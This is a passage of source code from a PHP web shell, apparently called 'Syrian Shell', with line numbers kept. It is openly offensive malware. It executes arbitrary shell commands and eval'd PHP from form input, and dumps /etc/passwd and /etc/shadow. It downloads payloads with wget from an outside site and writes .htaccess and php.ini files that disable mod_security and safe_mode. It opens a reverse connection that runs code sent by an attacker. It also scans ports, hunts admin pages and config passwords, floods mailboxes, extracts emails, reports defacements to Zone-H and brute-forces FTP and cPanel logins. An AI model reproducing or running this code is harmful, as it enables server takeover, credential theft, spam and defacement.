962 Dis_Functions = <sy>". DisableFunctions()." </sy><br>
963 Your IP = <sy>".GetRealIP()." </sy>
964 Server IP = <sy><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">".gethostbyname($_SERVER["HTTP_HOST"])."
965
966</sy></a>
967[</span><a href=http://www.yougetsignal.com/tools/web-sites-on-web-server target=\"_blank\"/>Reverse IP</a>]</span>
968 Date Time = <sy>".date('Y-m-d H:i:s')." </sy><br/>
969
970[<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
971[<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
972[<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
973<br>
974<br>
975<table bgcolor=#cccccc width=\"100%\"><tbody><tr>
976<td align=right width=100><p dir=ltr>
977<sy> Server : <br>
978<b>uname -a :
979<br>pwd : </span> <br>ID : </span> <br></b></sy></td><td>
980<p dir=ltr><font color=#cccccc size=-2><b> ".$server."
981<br> ".$uname." <sy><a href=http://www.google.com/search?q=".urlencode(@php_uname())." target=_blank>[Google]</a></sy><br> ".
982
983$dir."<br> ".Exe('id')."</b>
984</font></td></tr></tbody>
985</table>
986 [<a href='#down'>Down</a>]
987 [<a href='javascript:window.print()'>Print</a>]
988</table>";
989
990# ---------------------------------------#
991# Main Page #
992#----------------------------------------#
993if ($_GET['id']== 'mainPage')
994{
995 echo "<form method='post'><table width=100% border=1><tr><td>
996 <textarea name='ExecutionArea' rows=10 cols=152 style='color=red'>";
997
998 if(!$_POST || $_POST['login']) // Show Current Directory Contents if No Post in requesting ...
999 {
1000 @chdir($_POST['directory']);
1001 if($os == "Windows")
1002 {
1003 echo Exe('dir');
1004 }
1005 else if($os == "Linux")
1006 {
1007 echo Exe('ls');
1008 }
1009 }
1010 else if($_POST['submitCommands']) // Execute The Alias Command .
1011 {
1012 echo Exe($_POST['alias']);
1013 }
1014 else if($_POST['Execute']) // Execute The Command From Command Line .
1015 {
1016 @chdir($_POST['directory']);
1017 if(empty($_POST['cmd']))
1018 {
1019 if($os == "Windows")
1020 {
1021 echo Exe('dir');
1022 }
1023 else if($os == "Linux")
1024 {
1025 echo Exe('ls -lia');
1026 }
1027 }
1028 else
1029 {
1030 echo Exe($_POST['cmd']);
1031 }
1032 }
1033 else if($_POST['submitEval']) // Execute Eval Code .
1034 {
1035 $eval = @str_replace("<?php","",$_POST['php_eval']);
1036 $eval = @str_replace("<?php","",$eval);
1037 $eval = @str_replace("?>","",$eval);
1038 $eval = @str_replace("\\","",$eval);
1039 echo eval($eval);
1040 }
1041 # --------------------------
1042 # Hash Analyzer
1043 #---------------------------
1044 else if($_POST['analyzieNow'])
1045 {
1046 $hash = $_POST['hashToAnalyze'];
1047 $subHash = substr($hash,0,3);
1048 if($subHash =='$ap' && strlen($hash) == 37)
1049 {
1050 echo "The Hash : ".$hash." is : MD5(APR) Hash";
1051 }
1052 else if($subHash =='$1$' && strlen($hash) == 34)
1053 {
1054 echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
1055 }
1056 else if($subHash =='$H$' && strlen($hash) == 35)
1057 {
1058 echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
1059 }
1060 else if(strlen($hash) == 29)
1061 {
1062 echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
1063 }
1064 else if($subHash =='$5$' && strlen($hash) == 64)
1065 {
1066 echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
1067 }
1068 else if($subHash =='$6$' && strlen($hash) == 128)
1069 {
1070 echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
1071 }
1072 else if(strlen($hash) == 56)
1073 {
1074 echo "The Hash : ".$hash." is : SHA224 Hash";
1075 }
1076 else if(strlen($hash) == 64)
1077 {
1078 echo "The Hash : ".$hash." is : SHA256 Hash";
1079 }
1080 else if(strlen($hash) == 96)
1081 {
1082 echo "The Hash : ".$hash." is : SHA384 Hash";
1083 }
1084 else if(strlen($hash) == 128)
1085 {
1086 echo "The Hash : ".$hash." is : SHA512 Hash";
1087 }
1088 else if(strlen($hash) == 40)
1089 {
1090 echo "The Hash : ".$hash." is : MySQL v5.x Hash";
1091 }
1092 else if(strlen($hash) == 16)
1093 {
1094 echo "The Hash : ".$hash." is : MySQL Hash";
1095 }
1096 else if(strlen($hash) == 13)
1097 {
1098 echo "The Hash : ".$hash." is : DES(Unix) Hash";
1099 }
1100 else if(strlen($hash) == 32)
1101 {
1102 echo "The Hash : ".$hash." is : MD5 Hash";
1103 }
1104 else if(strlen($hash) == 4)
1105 {
1106 echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
1107 else
1108 {
1109 echo "Error : Can't Detect Hash Type";
1110 }
1111 }
1112 # --------------------------
1113 # Show Users
1114 #---------------------------
1115 else if($_POST['showUsers'])
1116 {
1117 function showUsers()
1118 {
1119
1120 if($rows = Exe('cat /etc/passwd'))
1121 {
1122 echo $rows;
1123 }
1124 elseif($rows= Exe('cat /etc/domainalias'))
1125 {
1126 echo $rows;
1127 }
1128 elseif($rows= Exe('cat /etc/shadow'))
1129 {
1130 echo $rows;
1131 }
1132 elseif($rows= Exe('cat /var/mail'))
1133 {
1134 echo $rows;
1135 }
1136 elseif($rows= Exe('cat /etc/valiases'))
1137 {
1138 echo $rows;
1139 }
1140 else { echo "[-] Can't Show Users :( ... Sorry ";}
1141 }
1142 showUsers();
1143 }
1144 # --------------------------
1145 # Generate perl
1146 #---------------------------
1147 else if($_POST['generatePel'])
1148 {
1149 @chdir($_POST["cgiperlPath"]);
1150 @mkdir("cgi", 0755);
1151 @chdir("cgi");
1152 Exe('wget http://www.syrian-shell.com/cgiPerl/cgiPerl.sy3.zip');
1153 Exe('unzip cgiPerl.sy3.zip');
1154 @unlink('cgiPerl.sy3.zip');
1155 @chmod("cgiPerl.sy3",0755);
1156 @chmod("compiler",0777);
1157 $cgi_h = fopen('.htaccess','w+');
1158 @fwrite($cgi_h,'AddHandler cgi-script .sy3');
1159 echo '
1160cgi.sy3 & .htaccess Has Been Created in [ cgi ] Directory
1161Password Is : sy34' ;
1162 }
1163 # --------------------------
1164 # Generate Server
1165 #---------------------------
1166 else if($_POST['generateSER'])
1167 {
1168 @chdir($_POST['ShourtCutPath']);
1169 @mkdir("allserver", 0755);
1170 @chdir("allserver");
1171 Exe("ln -s / allserver");
1172 GenerateFile(".htaccess","
1173 Options Indexes FollowSymLinks
1174 DirectoryIndex ssssss.htm
1175 AddType txt .php
1176 AddHandler txt .php");
1177 echo 'Now Go to allserver folder '.$_POST['ShourtCutPath'].'' ;
1178 }
1179 # --------------------------
1180 # Change Mode
1181 #---------------------------
1182 else if($_POST['changePermission'])
1183 {
1184 $ch_ok = @chmod($_POST['fileName'],$_POST['per']);
1185 if($ch_ok)
1186 echo "Permission Changed Successfully ! " ;
1187 else echo "Changing Is Not Allowed Or The File is not Exist !";
1188 }
1189 # --------------------------
1190 # Generate Users
1191 #---------------------------
1192 else if($_POST['GenerateUsers'])
1193 {
1194 @chdir($_POST['usersPath']);
1195 @mkdir("users", 0755);
1196 @chdir('users');
1197 Exe('wget http://www.syrian-shell.com/usersAndDomains/users.rar');
1198 Exe('mv users.rar users.sy3');
1199 @chmod('users.sy3',0755 );
1200 $user_h = fopen('.htaccess','w+');
1201 fwrite($user_h,'AddHandler cgi-script .sy3');
1202 echo "users.sy3 & .htaccess Has Been Created in [ users ] Directory" ;
1203 }
1204 # --------------------------
1205 # Forbidden
1206 #---------------------------
1207 else if($_POST['generateForbidden'])
1208 {
1209 @chdir($_POST['forbiddenPath']);
1210 @mkdir('forbidden');
1211 @chdir('forbidden');
1212 $htaccess = fopen('.htaccess','w+');
1213 if($_POST['403'] == 'DirectoryIndex')
1214 {
1215 fwrite($htaccess,"DirectoryIndex in.txt");
1216 }
1217 elseif($_POST['403'] == 'HeaderName')
1218 {
1219 fwrite($htaccess,"HeaderName in.txt");
1220 }
1221 elseif($_POST['403'] == 'TXT')
1222 {
1223 fwrite($htaccess,"
1224 Options Indexes FollowSymLinks
1225 addType txt .php
1226 AddHandler txt .php");
1227 }
1228 elseif($_POST['403'] == '404')
1229 {
1230 fwrite($htaccess,"
1231 ErrorDocument 404 /404.html
1232 404.html = Symlinked in.txt ");
1233 }
1234 elseif($_POST['403'] == 'ReadmeName')
1235 {
1236 fwrite($htaccess,"ReadmeName in.txt");
1237 }
1238 elseif($_POST['403'] == 'footerName')
1239 {
1240 fwrite($htaccess,"footerName in.txt");
1241 }
1242 echo "
1243Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
1244EX : ln -s /home/user/public_html/config.php in.txt";
1245 }
1246 # --------------------------
1247 # Upload Files
1248 #---------------------------
1249 else if($_POST['UploadNow'])
1250 {
1251 $nbr_uploaded =0;
1252 $files_uploded = array();
1253 $path= '';
1254 $target_path= $path . basename($_FILES['uploadfile']['name'][$i]);
1255 for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++)
1256 {
1257 if($_FILES['uploadfile']['name'][$i] != '')
1258 {
1259 move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $target_path . $_FILES['uploadfile']['name'][$i]);
1260 $files_uploded[] = $_FILES['uploadfile']['name'][$i];
1261 $nbr_uploaded++;
1262 echo "The File ".basename($_FILES['uploadfile']['name'][$i])." Uploaded Successfully !
1263";
1264 }
1265 else "The File ".basename($_FILES['uploadfile']['name'][$i])." Can't Be Upload :( !";
1266 }
1267 }
1268 # --------------------------
1269 # no Security
1270 #---------------------------
1271 else if($_POST['phpiniGenerate'])
1272 {
1273 GenerateFile("php.ini","
1274 safe_mode = Off
1275 disable_functions = NONE
1276 safe_mode_gid = OFF
1277 open_basedir = OFF");
1278 echo "php.ini Has Been Generated Successfully";
1279 }
1280 else if($_POST['htaccessGenerate'])
1281 {
1282 GenerateFile(".htaccess","
1283 <IfModule mod_security.c>
1284 SecFilterEngine Off
1285 SecFilterScanPOST Off
1286 SecFilterCheckURLEncoding Off
1287 SecFilterCheckCookieFormat Off
1288 SecFilterCheckUnicodeEncoding Off
1289 SecFilterNormalizeCookies Off
1290 </IfModule>
1291 SetEnv PHPRC ".getcwd()."php.ini
1292 suPHP_ConfigPath ".getcwd()."php.ini
1293 ");
1294 echo ".htaccess Has Been Generated Successfully ";
1295 }
1296 else if($_POST['iniphpGenerate'])
1297 {
1298 GenerateFile("ini.php","
1299 ini_restore(\"safe_mode\");
1300 ini_restore(\"open_basedir\");
1301 ");
1302 echo "ini.php Has Been Generated Successfully";
1303 }
1304 # --------------------------
1305 # Reading Files
1306 #---------------------------
1307 else if($_POST['read'] || $_POST['show'])
1308 {
1309 $file = $_POST['file'];
1310 $file = str_replace('\\\\','\\',$file);
1311
1312 if($_POST['read'])
1313 {
1314 $openMyFile = fopen($file,'r');
1315 if(function_exists('fread'))
1316 {
1317 echo fread($openMyFile,100000);
1318 }
1319 elseif(function_exists('fgets'))
1320 {
1321 echo fgets($openMyFile);
1322 }
1323 elseif(function_exists('readfile'))
1324 {
1325 echo readfile($openMyFile);
1326 }
1327 elseif(function_exists('file_get_contents'))
1328 {
1329 $readMyFile = @file_get_contents($file, NULL, NULL, 0, 1000000);
1330 var_dump($readMyFile);
1331 }
1332 elseif(function_exists('file'))
1333 {
1334 $readMyFile = file($myFile);
1335 foreach ($readMyFile as $line_num => $readMyFileLine)
1336 {
1337 echo "Line #$line_num : " . $readMyFileLine . "
1338 ";
1339 }
1340 }
1341 elseif(Exe("'cat ".$file."'"))
1342 {
1343 echo Exe("'cat ".$file."'");
1344 }
1345 elseif(function_exists('readfile'))
1346 {
1347 readfile($file);
1348 }
1349 elseif(function_exists('include'))
1350 {
1351 include($file);
1352 }
1353 elseif(function_exists('copy'))
1354 {
1355 $tmp=tempnam('','cx');
1356 copy('compress.zlib://'.$file,$tmp);
1357 $fh=fopen($tmp,'r');
1358 $data=fread($fh,filesize($tmp));
1359 fclose($fh);
1360 echo $data;
1361 }
1362 elseif(function_exists('mb_send_mail'))
1363 {
1364 if(file_exists('/tmp/mb_send_mail'))
1365 {
1366 unlink('/tmp/mb_send_mail');
1367 }
1368 @mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
1369 @readfile('/tmp/mb_send_mail');
1370 }
1371 else if(function_exists('curl_init'))
1372 {
1373 $fh=curl_init('file://'.$file.'');
1374 $tmp=curl_exec($fh);
1375 echo $tmp;
1376 if(strstr($file,DIRECTORY_SEPARATOR))
1377 $ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
1378 else $ch=curl_init('file://'.$file."\x00".__FILE__);
1379 var_dump(curl_exec($ch));
1380 }
1381 else if(is_writable('.'))
1382 {
1383 file_put_contents('php.ini','safe_mode = Off');
1384 readfile($file);
1385 unlink('php.ini');
1386 }
1387 else if(is_object($ws=new COM('WScript.Shell')))
1388 {
1389 echo $exec=comshelL("type \"$file\"",$ws);
1390 }
1391 else if(checkfunctioN('win_shell_execute'))
1392 {
1393 echo winshelL("type \"$file\"");
1394 }
1395 else if(checkfunctioN('win32_create_service'))
1396 {
1397 echo srvshelL("type \"$file\"");
1398 }
1399 else if(function_exists('imap_open'))
1400 {
1401 $str=imap_open('/etc/passwd','','');
1402 $list=imap_list($str,$file,'*');
1403 for($i=0;$i<count($list);$i++)
1404 {
1405 echo $list[$i]."\n";
1406 }
1407 imap_close($str);
1408 $str=imap_open($file,'','');
1409 $tmp=imap_body($str,1);
1410 echo $tmp;
1411 imap_close($str);
1412 }
1413 elseif($file == '/etc/passwd')
1414 {
1415 for($uid=0;$uid<99999;$uid++)
1416 {
1417 $h=posix_getpwuid($uid);
1418 if(!empty($h))
1419 foreach($h as $v)
1420 echo "$v:";
1421 echo "\r\n";
1422 }
1423 }
1424 fclose($openMyFile);
1425 }
1426 elseif($_POST['show'])
1427 {
1428 $con=glob("$file*");
1429 foreach ($con as $v)
1430 {
1431 echo "$v\n";
1432 }
1433 if(function_exists('imap_open'))
1434 {
1435 $str=imap_open('/etc/passwd','','');
1436 $s=explode("|",$file);
1437 if(count($s)>1)
1438 {
1439 $list=imap_list($str,trim($s[0]),trim($s[1]));
1440 }
1441 else
1442 {
1443 $list=imap_list($str,trim($str[0]),'*');
1444 }
1445 for($i=0;$i<count($list);$i++)
1446 {
1447 imap_close($str);
1448 }
1449 }
1450 else if(is_object($ws=new COM('WScript.Shell')))
1451 {
1452 $exec=comshelL("dir \"$file\"",$ws);
1453 $exec=str_replace("\t",'',$exec);
1454 echo $exec;
1455 }
1456 else if(checkfunctioN('win_shell_execute'))
1457 {
1458 echo winshelL("dir \"$file\"");
1459 }
1460 else if(checkfunctioN('win32_create_service'))
1461 {
1462 echo srvshelL("dir \"$file\"");
1463 }
1464 }
1465
1466 }
1467 # --------------------------
1468 # Encryption
1469 #---------------------------
1470 elseif($_POST['encryptNow'])
1471 {
1472 if(!empty($_POST['ENCRYPTION']))
1473 {
1474 $md5 = $_POST['ENCRYPTION'];
1475 echo "
1476MD5 : ".md5($md5)."
1477Base64 Encode : ".base64_encode($md5)."
1478Base64 Decode : ".base64_decode($md5)."
1479Crypt : ".crypt($md5)."
1480SHA1 : ".sha1($md5)."
1481MD4 : ".hash("md4",$md5)."
1482SHA256 : ".hash("sha256",$md5)."
1483URL Encoding : ".urlencode($md5)."
1484URL Decoding : ".str_hex($md5)."
1485CRC32 : ".crc32($md5)."
1486Length : ".strlen($md5)."";
1487 }
1488 else
1489 {
1490 echo "Please Put At Least One Char !";
1491 }
1492 }
1493 # --------------------------
1494 # Metasploit RC
1495 #---------------------------
1496 else if($_POST['metaConnect'])
1497 {
1498 $ip = $_POST['ip'];
1499 $port = $_POST['port'];
1500 if ($ip == "" && $port == "")
1501 {
1502 echo "Please fill IP Adress & The listen Port";
1503 }
1504 else
1505 {
1506 $ipaddr = $ip;
1507 $port = $port;
1508 if (FALSE !== strpos($ipaddr, ":"))
1509 {
1510 $ipaddr = "[". $ipaddr ."]";
1511 }
1512 if (is_callable('stream_socket_client'))
1513 {
1514 $msgsock = @stream_socket_client("tcp://{$ipaddr}:{$port}");
1515 if (!$msgsock)
1516 {
1517 die();
1518 }
1519 $msgsock_type = 'stream';
1520 }
1521 elseif (is_callable('fsockopen'))
1522 {
1523 $msgsock = fsockopen($ipaddr,$port);
1524 if (!$msgsock)
1525 {
1526 die();
1527 }
1528 $msgsock_type = 'stream';
1529 }
1530 elseif (is_callable('socket_create'))
1531 {
1532 $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
1533 $res = socket_connect($msgsock, $ipaddr, $port);
1534 if (!$res)
1535 {
1536 die();
1537 }
1538 $msgsock_type = 'socket';
1539 }
1540 else
1541 {
1542 die();
1543 }
1544 switch ($msgsock_type)
1545 {
1546 case 'stream': $len = fread($msgsock, 4); break;
1547 case 'socket': $len = socket_read($msgsock, 4); break;
1548 }
1549 if (!$len)
1550 {
1551 die();
1552 }
1553 $a = unpack("Nlen", $len);
1554 $len = $a['len'];
1555 $buffer = '';
1556 while (strlen($buffer) < $len)
1557 {
1558 switch ($msgsock_type)
1559 {
1560 case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer));
1561 break;
1562 case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));
1563 break;
1564 }
1565 }
1566 eval($buffer);
1567 echo "[*] Connection Terminated";
1568 die();
1569 }
1570 }
1571 # --------------------------
1572 # Scan Ports
1573 #---------------------------
1574 else if($_POST['submitDomainToScanPort'])
1575 {
1576 $domainToScan = $_POST['domainToScanPort'];
1577 if(!$domainToScan)
1578 {
1579 echo "[-] Enter IP Address Or Domain To Scan";
1580 }
1581 else
1582 {
1583 for($i=0;$i<1024;$i++)
1584 {
1585 $fp = @fsockopen($domainToScan,$i,$errno,$errstr,10);
1586 if($fp)
1587 {
1588 echo "[+] port " . $i . " open on " . $domainToScan . "
1589";
1590 }
1591 else
1592 {
1593 echo "[+] port " . $i . " closed on " . $domainToScan . "
1594";
1595 }
1596 flush();
1597 }
1598 fclose($fp);
1599 }
1600 }
1601
1602 if (isset($_POST["submit_lol"]))
1603 {
1604 set_time_limit(0);
1605 $url = $_POST['hash_lol'];
1606 echo "Testing ".$url."\n";
1607 $extention = $_POST['extention'];
1608 $adminlocales = array(
1609"admin/",
1610"wp-admin/",
1611"administration/",
1612"administrator/",
1613"moderator/",
1614"webadmin/",
1615"adminarea/",
1616"bb-admin/",
1617"adminLogin/",
1618"admin_area/",
1619"panel-administracion/",
1620"instadmin/",
1621"memberadmin/",
1622"administratorlogin/",
1623"adm/",
1624"siteadmin/login".$extention."",
1625"admin/account".$extention."",
1626"admin/index".$extention."",
1627"admin/login".$extention."",
1628"admin/admin".$extention."",
1629"admin_area/login".$extention."",
1630"admin_area/index".$extention."",
1631"admincp/index".$extention."",
1632"adminpanel".$extention."",
1633"webadmin".$extention."",
1634"webadmin/index".$extention."",
1635"webadmin/login".$extention."",
1636"admin/admin_login".$extention."",
1637"admin_login".$extention."",
1638"panel-administracion/login".$extention."",
1639"admin_area/admin".$extention."",
1640"bb-admin/index".$extention."",
1641"bb-admin/login".$extention."",
1642"bb-admin/admin".$extention."",
1643"admin/home".$extention."",
1644"pages/admin/admin-login".$extention."",
1645"admin/admin-login".$extention."",
1646"admin-login".$extention."",
1647"admin/adminLogin".$extention."",
1648"home".$extention."",
1649"adminarea/index".$extention."",
1650"admin/controlpanel".$extention."",
1651"admin".$extention."",
1652"admin/cp".$extention."",
1653"cp".$extention."",
1654"adminpanel.php",
1655"moderator".$extention."",
1656"administrator/index".$extention."",
1657"administrator/login".$extention."",
1658"user".$extention."",
1659"administrator/account".$extention."",
1660"administrator".$extention."",
1661"login".$extention."",
1662"modelsearch/login".$extention."",
1663"moderator/login".$extention."",
1664"panel-administracion/admin".$extention."",
1665"admincontrol/login".$extention."",
1666"adm/index".$extention."",
1667"moderator/admin".$extention."",
1668"account".$extention."",
1669"controlpanel".$extention."",
1670"admincontrol".$extention."",
1671"webadmin/admin".$extention."",
1672"adminLogin".$extention."",
1673"panel-administracion/login".$extention."",
1674"wp-login".$extention."",
1675"adminLogin".$extention."",
1676"admin/adminLogin".$extention."",
1677"adminarea/index".$extention."",
1678"adminarea/admin".$extention."",
1679"adminarea/login".$extention."",
1680"panel-administracion/index".$extention."",
1681"modelsearch/index".$extention."",
1682"modelsearch/admin".$extention."",
1683"adm/admloginuser".$extention."",
1684"admloginuser".$extention."",
1685"admin2".$extention."",
1686"admin2/login".$extention."",
1687"admin2/index".$extention."",
1688"adm/index".$extention."",
1689"adm".$extention."",
1690"affiliate".$extention."",
1691"adm_auth".$extention."",
1692"memberadmin".$extention."",
1693"administratorlogin".$extention."");
1694 foreach ($adminlocales as $admin)
1695 {
1696 $headers = @get_headers("$url$admin");
1697 if (@eregi('200', $headers[0]))
1698 {
1699 echo "[+] $url$admin ~ Found!\n";
1700 }
1701
1702 }
1703 }
1704 # --------------------------
1705 # Config Finder
1706 #---------------------------
1707 else if($_POST['configFinderSubmit'])
1708 {
1709 set_time_limit(0);
1710 $passwd=fopen('/etc/passwd','r');
1711 if (!$passwd)
1712 {
1713 echo "[-] Error : coudn't read /etc/passwd";
1714 exit;
1715 }
1716 $path_to_public=array();
1717 $users=array();
1718 $pathtoconf=array();
1719 $i=0;
1720 while(!feof($passwd))
1721 {
1722 $str=fgets($passwd);
1723 if ($i>35)
1724 {
1725 $pos=strpos($str,":");
1726 $username=substr($str,0,$pos);
1727 $dirz="/home/$username/public_html/";
1728 if (($username!=""))
1729 {
1730 if (is_readable($dirz))
1731 {
1732 array_push($users,$username);
1733 array_push($path_to_public,$dirz);
1734 }
1735 }
1736 }
1737 $i++;
1738 }
1739 echo "";
1740 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
1741 ";
1742 echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
1743 ";
1744 echo "[~] Searching for passwords in config.* files...
1745 ";
1746 foreach ($users as $user)
1747 {
1748 $path="/home/$user/public_html/";
1749 read_dir($path,$user);
1750 }
1751 echo "[+] Done";
1752 }
1753 # --------------------------
1754 # Mail Storm
1755 #---------------------------
1756 else if($_POST['sendMailStorm'])
1757 {
1758 $to=$_POST['to'];
1759 $nom=$_POST['nom'];
1760 $Comments=$_POST['Comments'];
1761 if ($to <> "" )
1762 {
1763 for ($i = 0; $i < $nom ; $i++)
1764 {
1765 $from = rand (71,1020000000)."@"."Attacker.com";
1766 $subject= md5("$from");
1767 if(@mail($to,$subject,$Comments,"From:$from"))
1768 echo "[+] $i spammed !!
1769";
1770 else
1771 {
1772 echo "[-] $i Failed !!
1773";
1774 }
1775 }
1776 }
1777 }
1778 # --------------------------
1779 # Extract Emails
1780 #---------------------------
1781 else if($_POST['getEmails'])
1782 {
1783 $emhost = $_POST['EM_HOST'];
1784 $emuser = $_POST['EM_USER'];
1785 $empass = $_POST['EM_PASS'];
1786 $emdb = $_POST['EM_DB'];
1787 $emtab = $_POST['EM_TABLE'];
1788 $emcol = $_POST['EM_COLUMN'];
1789 $try2Connect = @mysql_connect($emhost,$emuser,$empass);
1790 if(!$try2Connect)
1791 {
1792 echo "[-] Can't Connect To DB !! [ user name || password is wrong ! ] .
1793";
1794 }
1795 $try2Select = @mysql_select_db($emdb);
1796 if(!$try2Select && $try2Connect)
1797 {
1798 echo "[-] DB Name is Wrong !! . ";
1799 }
1800 $sql = @mysql_query("SELECT * FROM $emtab");
1801 while ($res = @mysql_fetch_array($sql))
1802 {
1803 echo ''.$res["$emcol"].'
1804';
1805 }
1806 }
1807 // Help
1808 else if($_POST['emailExtractorHelp'])
1809 {
1810 echo "This is Some Tables Name & Columns Name For Some Fam Scripts ..
1811
1812[+] VBulletin
1813Table-name : user
1814column-name : email
1815
1816[+] WordPress
1817Table-name : wp_users
1818column-name : user_email
1819
1820[+] Joomla
1821Table-name : jos_users
1822column-name : email
1823
1824[+] PHPBB
1825Table-name : phpbb_users
1826column-name : user_email
1827
1828[+] I.P.Board
1829Table-name : ibf_members
1830column-name : email
1831
1832[+] SMF
1833Table-name : smf_members
1834column-name : emailAddress ";
1835 }
1836 # --------------------------
1837 # MySQL Query
1838 #---------------------------
1839 else if($_POST['MySQLQuery'])
1840 {
1841 $qu_host =$_POST['QU_HOST'];
1842 $qu_user =$_POST['QU_USER'];
1843 $qu_pass =$_POST['QU_PASS'];
1844 $qu_db =$_POST['QU_DB'];
1845 $query =$_POST['QU'];
1846 if (empty($_POST['QU_HOST']))
1847 $qu_host = 'localhost';
1848 $query = str_replace("\\","",$query);
1849 if (!empty($_POST['QU']))
1850 {
1851 $tryConnection = @mysql_connect($qu_host,$qu_user,$qu_pass);
1852 if(!$tryConnection)
1853 {
1854 echo "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!";
1855 }
1856 else
1857 {
1858 $selectDB = @mysql_select_db($qu_db);
1859 if(!$selectDB)
1860 {
1861 echo "[-] Database Name Is Wrong !!";
1862 }
1863 else
1864 {
1865 $qqok1 = mysql_query($query);
1866 if(!$qqok1)
1867 {
1868 echo "[-] Can't Execute The Query";
1869 }
1870 }
1871 }
1872 @mysql_close();
1873 }
1874 if ($qqok1)
1875 {
1876 update();
1877 }
1878 }
1879 # --------------------------
1880 # SQL Reader
1881 #---------------------------
1882 else if ($_POST['sql2Read'])
1883 {
1884 $host = $_POST['host'];
1885 $user = $_POST['user'];
1886 $pass = $_POST['pass'];
1887 $db = $_POST['db'];
1888 $unique = uniqid('N');
1889 $file = $_POST['file'];
1890 $file = str_replace('\\\\','\\',$file);
1891 $query = array(
1892 "CREATE TEMPORARY TABLE $unique (file LONGBLOB)",
1893 "LOAD DATA INFILE '".mysql_real_escape_string($file)."' INTO TABLE $unique",
1894 "SELECT * FROM $unique"
1895 );
1896 $connect = mysql_connect($host,$user, $pass);
1897 mysql_select_db($db,$connect);
1898 foreach($query as $Allqueries)
1899 {
1900 $mysqlQuery = mysql_query($Allqueries,$connect);
1901 while($line = @mysql_fetch_row($mysqlQuery))
1902 echo htmlspecialchars($line[0]);
1903 echo "\n";
1904 }
1905 }
1906 # --------------------------
1907 # Edit File
1908 #---------------------------
1909 else if($_POST['editFileSubmit'])
1910 {
1911 $file2Edit = $_POST['editFile'];
1912 echo @file_get_contents($file2Edit);
1913 }
1914 else if($_POST['saveEditedFile'])
1915 {
1916 $fileName = $_POST['file2edit'];
1917 $newFile = $_POST['ExecutionArea'];
1918 $trytoGenerate = GenerateFile($fileName,$newFile);
1919 if($trytoGenerate)
1920 {
1921 echo "[+] File Saved !";
1922 }
1923 else
1924 {
1925 echo "[-] Failed To Save File !!";
1926 }
1927 }
1928 # --------------------------
1929 # Zone H Attacker
1930 #---------------------------
1931 else if($_POST['SendNowToZoneH'])
1932 {
1933 ob_start();
1934 $sub = @get_loaded_extensions();
1935 if(!in_array("curl", $sub))
1936 {
1937 die('[-] Curl Is Not Supported !! ');
1938 }
1939
1940 $hacker = $_POST['defacer'];
1941 $method = $_POST['hackmode'];
1942 $neden = $_POST['reason'];
1943 $site = $_POST['domain'];
1944
1945 if (empty($hacker))
1946 {
1947 die ("[-] You Must Fill the Attacker name !");
1948 }
1949 elseif($method == "--------SELECT--------")
1950 {
1951 die("[-] You Must Select The Method !");
1952 }
1953 elseif($neden == "--------SELECT--------")
1954 {
1955 die("[-] You Must Select The Reason");
1956 }
1957 elseif(empty($site))
1958 {
1959 die("[-] You Must Inter the Sites List ! ");
1960 }
1961 $i = 0;
1962 $sites = explode("\n", $site);
1963 while($i < count($sites))
1964 {
1965 if(substr($sites[$i], 0, 4) != "http")
1966 {
1967 $sites[$i] = "http://".$sites[$i];
1968 }
1969 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
1970 echo "Site : ".$sites[$i]." Defaced !\n";
1971 ++$i;
1972 }
1973 echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
1974 }
1975 # --------------------------
1976 # FTP And Cpanle Brute Force Attacker
1977 #---------------------------
1978 else if($_POST['BruteForceCpanelAndFTP'])
1979 {
1980 $connect_timeout=5;
1981 set_time_limit(0);
1982 $submit=$_REQUEST['BruteForceCpanelAndFTP'];
1983 $users=$_REQUEST['users'];
1984 $pass=$_REQUEST['passwords'];
1985 $target=$_REQUEST['target'];
1986 $cracktype=$_REQUEST['cracktype'];
1987
1988 if(empty($target))
1989 {
1990 $target = "localhost";
1991 }
1992
1993 function ftp_check($host,$user,$pass,$timeout)
1994 {
1995 $ch = curl_init();
1996 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1997 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1998 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1999 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
2000 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
2001 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
2002 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
2003 $data = curl_exec($ch);
2004 if ( curl_errno($ch) == 28 )
2005 {
2006 print "Error : Connection Timeout Please Check The Target Hostname .";
2007 exit;
2008 }
2009 elseif ( curl_errno($ch) == 0 )
2010 {
2011 print "[+] Cracking Success With Username ($user) and Password ($pass)";
2012 }
2013 curl_close($ch);
2014 }
2015 function cpanel_check($host,$user,$pass,$timeout)
2016 {
2017 $ch = curl_init();
2018 curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
2019 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2020 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
